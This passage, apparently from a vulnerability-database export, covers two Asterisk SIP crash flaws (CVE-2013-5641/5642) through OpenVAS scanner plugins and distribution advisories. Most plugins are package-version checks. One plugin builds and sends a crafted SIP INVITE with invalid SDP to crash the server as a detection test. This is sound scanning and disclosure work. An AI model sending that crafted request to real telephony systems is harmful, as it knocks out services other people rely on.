exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-24T11:10:14", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15567", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2018-01-24T00:00:00", "id": "OPENVAS:866888", "href": "http://plugins.openvas.org/nasl.php?oid=866888", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866888);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:05 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15567\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. 
Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15567\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:03", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310892749", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892749", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2749.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2749-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892749\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2013-5642\", \"CVE-2013-5641\");\n script_name(\"Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-02 00:00:00 +0200 (Mon, 02 Sep 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2749.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\");\n script_tag(name:\"summary\", value:\"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\");\n 
script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mobile\", 
ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:54", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15560", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310866890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under 
the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866890\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:16 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15560\");\n\n\n script_tag(name:\"affected\", value:\"asterisk on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-15560\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:21", "description": "This host is running Asterisk Server and is prone to denial of service\n vulnerability.", "cvss3": {}, "published": "2013-10-28T00:00:00", "type": "openvas", "title": "Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5642"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310802063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_asterisk_invalid_sdp_dos_vuln.nasl 13994 2019-03-05 12:23:37Z cfischer $\n#\n# Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:digium:asterisk\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802063\");\n script_version(\"$Revision: 13994 $\");\n script_cve_id(\"CVE-2013-5642\");\n script_bugtraq_id(62022);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 13:23:37 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-28 15:06:58 +0530 (Mon, 28 Oct 2013)\");\n script_name(\"Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_asterisk_detect.nasl\");\n script_mandatory_keys(\"Asterisk-PBX/Installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54534\");\n script_xref(name:\"URL\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22007\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Asterisk Server and is prone to denial of service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send invalid SDP SIP request and check is it vulnerable to DoS or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Asterisk Open Source to 1.8.23.1, 10.12.3, 11.5.1 or later,\n Certified Asterisk to 1.8.15-cert3, 11.2-cert2 or later,\n Asterisk Digiumphones 10.12.3-digiumphones or 
later.\");\n\n script_tag(name:\"insight\", value:\"Error within the SIP channel driver when handling a crafted SDP in a SIP\n request.\");\n\n script_tag(name:\"affected\", value:\"Asterisk Open Source 1.8.x to 1.8.23.0, 10.x to 10.12.2 and 11.x to 11.5.0\n Certified Asterisk 1.8.15 to 1.8.15-cert2 and 11.2 to 11.2-cert1\n Asterisk Digiumphones 10.x-digiumphones to 10.12.2-digiumphones\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to cause a denial of\n service via a crafted SDP in a SIP request.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_xref(name:\"URL\", value:\"http://www.asterisk.org\");\n exit(0);\n}\n\ninclude(\"sip.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_location_and_proto( cpe:CPE, port:port ) )\n exit( 0 );\n\nproto = infos[\"proto\"];\nif( ! 
sip_alive( port:port, proto:proto ) )\n exit( 0 );\n\nhost_name = get_host_name();\nthis_host = this_host();\n\nvtstrings = get_vt_strings();\nuseragent = vtstrings[\"default\"];\n\ncon_data = string(\"v=0\", \"\\r\\n\",\n \"o=user1 53655765 2353687637 IN IP4\", this_host,\"\\r\\n\",\n \"s=-\", \"\\r\\n\",\n \"t=0 0\", \"\\r\\n\",\n \"m=audio 6000 RTP/AVP 8 0\", \"\\r\\n\",\n \"m=video 6002 RTP/AVP 31\", \"\\r\\n\",\n \"c=IN IP4\", this_host);\n\ncraf_req = string( \"INVITE sip:test@\", host_name, \":\", port, \" SIP/2.0\", \"\\r\\n\",\n \"Via: SIP/2.0/\", toupper( proto ), \" \", this_host, \":\", port,\";branch=z9hG4bK-25912-1-0\",\"\\r\\n\",\n \"From: test1 <sip:guest0@\", this_host, \":\", port, \";tag=1\", \"\\r\\n\",\n \"To: test <sip:test@\", host_name, \":\", port, \">\", \"\\r\\n\",\n \"Call-ID: 1-25912@\", this_host, \"\\r\\n\",\n \"CSeq: 1 INVITE\", \"\\r\\n\",\n \"Contact: sip:guest@\", this_host, \":\", port, \"\\r\\n\",\n \"Max-Forwards: 70\", \"\\r\\n\",\n \"Subject: DoS Test\", \"\\r\\n\",\n \"User-Agent: \", useragent, \" DoS Test\", \"\\r\\n\",\n \"Content-Type: application/sdp\", \"\\r\\n\",\n \"Content-Length: \", strlen(con_data), \"\\r\\n\\r\\n\",\n con_data, \"\\r\\n\");\n\nsip_send_recv( port:port, data:craf_req, proto:proto );\nsleep( 2 );\n\nif( ! 
sip_alive( port:port, proto:proto ) ) {\n security_message( port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:19", "description": "Gentoo Linux Local Security Checks GLSA 201401-15", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201401-15", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-5642", "CVE-2012-5976", "CVE-2012-5977", "CVE-2013-7100", "CVE-2013-2686"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201401-15.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121112\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:35 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201401-15\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201401-15\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\", \"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\", \"CVE-2013-5641\", \"CVE-2013-5642\", \"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201401-15\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: 
make_list(\"ge 11.7.0\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(\"ge 1.8.25.0\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(), vulnerable: make_list(\"lt 11.7.0\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "A remotely exploitable crash vulnerability exists in the SIP channel driver if an ACK with SDP is received after the channel has been terminated. The handling code incorrectly assumes that the channel will always be present (CVE-2013-5641). A remotely exploitable crash vulnerability exists in the SIP channel driver if an invalid SDP is sent in a SIP request that defines media descriptions before connection information. The handling code incorrectly attempts to reference the socket address information even though that information has not yet been set (CVE-2013-5642). 
\n", "cvss3": {}, "published": "2013-08-30T17:36:06", "type": "mageia", "title": "Updated asterisk package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-08-30T17:36:06", "id": "MGASA-2013-0266", "href": "https://advisories.mageia.org/MGASA-2013-0266.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2023-02-24T13:09:32", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2749-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 02, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-5641 CVE-2013-5642\n\nColin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony \ntoolkit -, which could result in denial of service.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to 
apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2013-09-02T14:48:20", "type": "debian", "title": "[SECURITY] [DSA 2749-1] asterisk security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-02T14:48:20", "id": "DEBIAN:DSA-2749-1:E342B", "href": "https://lists.debian.org/debian-security-announce/2013/msg00160.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe Asterisk project reports:\n\nRemote Crash From Late Arriving SIP ACK With SDP\nRemote Crash when Invalid SDP is sent in SIP Request\n\n\n", "cvss3": {}, "published": "2013-08-27T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-08-29T00:00:00", "id": 
"FD2BF3B5-1001-11E3-BA94-0025905A4771", "href": "https://vuxml.freebsd.org/freebsd/fd2bf3b5-1001-11e3-ba94-0025905a4771.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T06:59:26", "description": "A denial of service vulnerability exists in Asterisk Open Source, Certified Asterisk and Asterisk with Digiumphones.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP Invalid SDP Media Descriptions Denial of Service (CVE-2013-5642)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5642"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-2961", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:01:13", "description": "A denial of service vulnerability exists in Asterisk Open Source and Certified Asterisk.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP Terminated Channel ACK with SDP Denial of Service (CVE-2013-5641)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5641"], "modified": "2022-11-27T00:00:00", 